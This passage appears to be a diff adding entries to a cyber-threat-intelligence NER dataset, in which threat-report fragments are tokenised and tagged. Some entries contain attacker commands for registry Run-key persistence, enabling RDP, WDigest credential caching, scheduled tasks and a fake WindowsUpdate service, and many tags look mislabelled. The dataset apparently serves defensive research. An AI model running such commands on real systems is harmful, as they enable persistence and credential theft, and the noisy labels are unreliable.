"for", + "RC4", + "encryption", + "and", + "decryption." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RC4-decrypts", + "command", + "data", + "returned", + "in", + "the", + "Data", + "field." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "dropper", + "configures", + "the", + "backdoor", + "with", + "a", + "C2", + "server", + "address,", + "RC4", + "encryption", + "key," + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Base64-decodes" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "decryption." + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "decrypt", + "the", + "Data", + "field." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "and", + "executes", + "in", + "memory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "embedded", + "key", + "to", + "decrypt", + "the", + "source", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "deobfuscated", + "SMOKEDHAM", + "dropper." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Upload", + "a", + "screen", + "capture", + "to", + "its", + "C2", + "server" + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "backdoor", + "writes", + "captured", + "keystrokes", + "to", + "memory", + "and", + "uploads", + "them", + "to", + "its", + "C2", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reg.exe", + "add", + "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "created", + "a", + "persistence", + "mechanism", + "for", + "NGROK", + "by", + "adding", + "VirtualHost.vbs", + "to", + "the", + "WindNT", + "value", + "under", + "the", + "current", + "users", + "Run", + "registry", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "created", + "a", + "persistence", + "mechanism", + "for", + "UltraVNC", + "by", + "adding", + "the", + "application", + "to", + "the", + "ConhostNT", + "value", + "under", + "the", + "current", + "users", + "Run", + "registry", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reg.exe", + "add", + "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "store", + "a", + "file", + "named", + "update.lnk", + "in", + "the", + "%APPDATA%\\Microsoft\\Windows\\Start", + "Menu\\Programs\\Startup\\", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "command", + "line", + "argument", + "provided" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "passed", + "as", + "an", + "argument", + "on", + "the", + "command", + "line." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executed", + "using", + "the", + "Command-Line", + "Compiler." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "launched", + "with", + "a", + "command", + "line" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "Command", + "Prompt." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "backdoor", + "source", + "code", + "is", + "embedded", + "as", + "an", + "encrypted", + "string." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "whoami.exe" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "systeminfo.exe" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "reg.exe", + "ADD", + "'HKLM\\SOFTWARE\\Microsoft\\Windows", + "NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "modifying", + "Terminal", + "Server", + "registry", + "key", + "values" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "modifying", + "the", + "Local", + "Security", + "Authority", + "(LSA)", + "registry", + "key", + "value" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reg.exe", + "ADD", + "'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal", + "Server'", + "/v", + "fDenyTSConnections", + "/t", + "REG_DWORD", + "/d", + "0", + "/f" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "reg.exe", + "ADD", + "'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal", + "Server'", + "/v", + "fSingleSessionPerUser", + "/t", + "REG_DWORD", + "/d", + "0", + "/f" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "reg.exe", + "ADD", + "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa", + "/v", + "LimitBlankPasswordUse", + "/t", + "REG_DWORD", + "/d", + "1", + "/f" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "modified", + "the", + "WDigest", + "registry", + "key", + "value", + "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential", + "to", + "enable", + "credential", + "caching." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "enable", + "multiple", + "Remote", + "Desktop", + "connection", + "sessions" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Tool", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "the", + "attacker", + "was", + "observed", + "moving", + "laterally", + "to", + "different", + "systems", + "in", + "the", + "environment", + "using", + "Remote", + "Desktop", + "Protocol", + "(RDP)", + "connections." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "attacker", + "dump", + "the", + "LSASS", + "process", + "using", + "Task", + "Manager", + "to", + "a", + "file", + "named", + "lsass.DMP,", + "and", + "later,", + "zip", + "the", + "dump", + "into", + "two", + "files", + "named", + "lsass.zip", + "and", + "lsass2.zip", + "located", + "in", + "the", + "C:\\ProgramData\\psh\\", + "directory." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LSASS", + "Dumping" + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam" + ] + }, + { + "tokens": [ + "conducted", + "credential", + "harvesting", + "via", + "dumping", + "LSASS", + "memory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "activity", + "from", + "Tor" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "hop", + "points", + "to", + "enable", + "their", + "cyber", + "operations", + "while", + "remaining", + "anonymous." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "“The", + "Onion", + "Router”", + "(Tor)", + "is", + "often", + "used", + "by", + "cyber", + "threat", + "actors", + "for", + "anonymity", + "and", + "C2." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "resulted", + "in", + "confirmed", + "compromises", + "of", + "internet-facing", + "Federal", + "Government", + "agency", + "systems." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O", + "O" + ] + }, + { + "tokens": [ + "resulted", + "in", + "confirmed", + "compromises", + "of", + "internet-facing", + "Federal", + "Government", + "agency", + "systems." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "actors", + "leveraging", + "CVE-2019-19781", + "to", + "compromise", + "Citrix", + "Application", + "Delivery", + "Controllers." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attack", + "of", + "a", + "Remote", + "Desktop", + "Protocol", + "on", + "a", + "public-facing", + "server." + ], + "ner_tags": [ + "B-OffAct", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "threat", + "actors", + "using", + "external", + "proxy", + "tools" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "proxy", + "tools", + "may", + "be", + "commercially", + "available", + "infrastructure", + "as", + "a", + "service", + "(IaaS)", + "or", + "software", + "as", + "a", + "service", + "(SaaS)", + "in", + "the", + "form", + "of", + "a", + "web", + "browser", + "promising", + "anonymity", + "on", + "the", + "internet." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "proxy", + "tools", + "depending", + "on", + "their", + "intended", + "use." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "activity", + "from", + "a", + "network", + "proxy", + "tool" + ], + "ner_tags": [ + "B-OffAct", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyber", + "threat", + "actors", + "also", + "continue", + "to", + "identify", + "large", + "repositories", + "of", + "credentials", + "that", + "are", + "available", + "on", + "the", + "internet", + "to", + "enable", + "brute-force", + "attacks." + ], + "ner_tags": [ + "B-Time", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "brute-force", + "passwords." + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "threat", + "actors", + "using", + "Mimikatz", + "in", + "conjunction", + "with", + "coin", + "miner", + "protocols", + "and", + "software." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "used", + "Mimikatz", + "to", + "dump", + "credentials", + "from", + "the", + "OS", + "using", + "a", + "variety", + "of", + "capabilities", + "resident", + "within", + "the", + "tool." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "actors", + "using", + "Mimikatz", + "during", + "their", + "operations." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "brute-force", + "attack", + "of", + "a", + "Remote", + "Desktop", + "Protocol", + "on", + "a", + "public-facing", + "server." + ], + "ner_tags": [ + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "such", + "as", + "a", + "keystroke", + "logger" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "file", + "injection", + "capability" + ], + "ner_tags": [ + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "actors", + "to", + "execute", + "directory", + "traversal", + "attacks" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "or", + "delete", + "files" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "allows", + "cyber", + "threat", + "actors", + "to", + "execute", + "arbitrary", + "system", + "commands," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "concealed", + "programs", + "and", + "documents", + "at", + "innocuous-seeming", + "locations", + "on", + "victim", + "networks", + "and", + "in", + "victim", + "networks’", + "“recycle", + "bins.”" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "lures", + "are", + "designed", + "to", + "socially", + "engineer", + "the", + "recipient", + "to", + "download", + "and", + "open", + "an", + "attached", + "RAR", + "file", + "that", + "contains", + "either", + "a", + "Microsoft", + "Compiled", + "HTML", + "Help", + "(CHM)", + "or", + "Excel", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "phishing", + "emails", + "that", + "were", + "used", + "as", + "lures", + "to", + "deliver", + "the", + "files" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download", + "further", + "malware", + "payloads" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "download", + "a", + "next", + "stage", + "EXE", + "payload", + "using", + "cURL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "downloading", + "of", + "the", + "next", + "stage." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "scheduled", + "task", + "(shown", + "below)", + "runs", + "every", + "15", + "minutes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\System32\\schtasks.exe", + "/create", + "/sc", + "MINUTE", + "/mo", + "15", + "/TN" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "two", + "different", + "scheduled", + "tasks." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scheduled", + "task" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "second", + "scheduled", + "task", + "created", + "attempts", + "to", + "execute", + "the", + "payload", + "downloaded", + "by", + "the", + "other", + "task:", + "\"C:\\Windows\\System32\\schtasks.exe\"", + "/create", + "/sc", + "MINUTE", + "/mo", + "20", + "/TN" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-Idus", + "B-Idus", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "create", + "a", + "scheduled", + "task" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\System32\\schtasks.exe", + "/create", + "/sc", + "minute", + "/mo", + "15", + "/tn" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "to", + "create", + "scheduled", + "tasks", + "for", + "persistence" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "schtasks", + "/create", + "/tn", + "WinSecurity", + "/sc", + "minute", + "/mo", + "15" + ], + "ner_tags": [ + "B-Way", + "B-SamFile", + "B-SamFile", + "B-Way", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "payloads", + "are", + "compressed", + "inside", + "RAR", + "files,", + "this", + "helps", + "avoid", + "static", + "analysis", + "techniques" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "more", + "common", + "payloads", + "contained", + "within", + "the", + "RAR", + "files", + "are", + "Microsoft", + "Compiled", + "HTML", + "Help", + "(CHM)", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "computer", + "name" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "computer", + "name", + "is", + "sent", + "to", + "the", + "C2" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "username", + "is", + "also", + "sent", + "to", + "the", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "computer", + "name", + "and", + "the", + "username", + "is", + "also", + "sent", + "to", + "the", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "computer", + "name", + "is", + "sent", + "to", + "the", + "C2" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "plugins", + "such", + "as", + "a", + "keylogger," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "remote", + "access", + "tool" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "file", + "stealer" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "encoded", + "PowerShell", + "command", + "stage,", + "obfuscating", + "the", + "activity", + "further", + "than", + "just", + "simple", + "string", + "concatenation." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Encoded", + "PowerShell", + "command" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decoded", + "command" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actors", + "obtain", + "initial", + "access", + "to", + "networks", + "is", + "through", + "the", + "use", + "of", + "compromised", + "valid", + "credential", + "pairs" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "often", + "will", + "search", + "for", + "directories", + "on", + "the", + "network" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "remote", + "desktop", + "protocol", + "(RDP)", + "and", + "secure", + "shell", + "(SSH)", + "accesses" + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Threat", + "actors", + "will", + "look", + "for", + "networks", + "that", + "have", + "internet-facing", + "servers", + "running", + "RDP", + "and", + "then", + "exploit", + "vulnerabilities", + "in", + "those", + "servers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exposed", + "RDP", + "servers", + "are", + "also", + "abused", + "by", + "threat", + "actors", + "to", + "gain", + "initial", + "access", + "into", + "a", + "targets", + "network." + ], + "ner_tags": [ + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "brute", + "force", + "password", + "attacks" + ], + "ner_tags": [ + "O", + "B-Way", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "server", + "contained", + "HTTP", + "header", + "data", + "(SimpleHTTP/0.6", + "Python/3.8.10),", + "indicating", + "the", + "use", + "of", + "a", + "Python", + "library", + "called", + "SIMPLEHTTPSERVER" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "also", + "engaged", + "in", + "brute-forcing", + "against", + "the", + "victim's", + "internal", + "web", + "services" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "brute", + "forcing", + "tool", + "called", + "FSCAN." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "brute-force", + "attacks", + "on", + "systems" + ], + "ner_tags": [ + "B-Org", + "B-OffAct", + "O", + "O" + ] + }, + { + "tokens": [ + "brute", + "forcing", + "attempts", + "on", + "some", + "of", + "the", + "internal", + "FTP", + "servers", + "inside", + "victim", + "network" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "database", + "used", + "a", + "weak", + "password", + "and", + "was", + "susceptible", + "to", + "brute-force", + "attacks." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "threat", + "actor", + "used", + "the", + "Windows", + "command-line", + "arguments" + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "received", + "a", + "command-line", + "argument", + "from", + "attacker" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Used", + "to", + "search", + "for", + "the", + "string", + "\"DBPath\"", + "in", + "all", + "files", + "within", + "the", + "current", + "directory", + "and", + "its", + "subdirectories" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "List", + "of", + "recently", + "opened", + "files", + "and", + "folders", + "on", + "the", + "computer." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "uses", + "stolen", + "passwords", + "from", + "valid", + "accounts" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "escalate", + "privileges", + "using", + "valid", + "accounts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "reverse", + "SOCKS", + "proxy", + "activity", + "on", + "the", + "infected", + "device", + "using", + "the", + "open-source", + "tool", + "FRP." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "After", + "establishing", + "the", + "reverse", + "SOCKS", + "proxy", + "connection," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "utilized", + "open-source", + "reverse", + "proxy", + "tools", + "to", + "expose", + "local", + "devices", + "located", + "behind", + "a", + "NAT", + "or", + "firewall,", + "to", + "the", + "Internet." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Execution", + "of", + "FRP", + "reverse", + "SOCKS", + "proxy", + "on", + "infected", + "host." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Installation", + "of", + "malicious", + "Windows", + "service." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "it", + "will", + "install", + "a", + "fake", + "Windows", + "service", + "called", + "“windowsupdate”" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Malicious", + "service", + "installation", + "is", + "accomplished", + "via", + "the", + "below", + "command", + "line", + "argument:", + "sc", + "create", + "WindowsUpdate", + "binPath=", + "C:\\Windows\\Temp\\svchost.exe", + "start=", + "auto", + "obj=", + "LocalSystem", + "DisplayName=", + "windowsupdate" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maintain", + "Presence", + "via", + "Windows", + "Service", + "Installation" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "establish", + "persistent", + "remote", + "access", + "on", + "the", + "victim", + "device,", + "the", + "threat", + "actor", + "abused", + "Windows", + "services", + "to", + "install", + "modified", + "version", + "of", + "Cobalt", + "Strike", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "installed", + "a", + "second", + "stage", + "persistence", + "backdoor", + "on", + "infected", + "device", + "by", + "abusing", + "Windows", + "Services." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "This", + "service", + "executes", + "a", + "malicious", + "binary", + "(Cobalt", + "Strike", + "Cat", + "payload)", + "under", + "“C:\\Windows\\Temp\\svchost.exe”", + "every", + "time", + "the", + "victim", + "device", + "is", + "started." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "services", + "ran", + "with", + "the", + "highest", + "privilege,", + "NT", + "AUTHORITY\\SYSTEM", + "and", + "execute", + "the", + "malware", + "automatically", + "during", + "system", + "startup,", + "allowing", + "for", + "remote", + "access", + "to", + "the", + "victim", + "device", + "with", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "used", + "private", + "proxy", + "addresses", + "from", + "a", + "Chinese", + "underground", + "proxy", + "IP", + "solution", + "called", + "'Tigercloud", + "Club'", + "to", + "conceal", + "their", + "real", + "IP", + "address." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 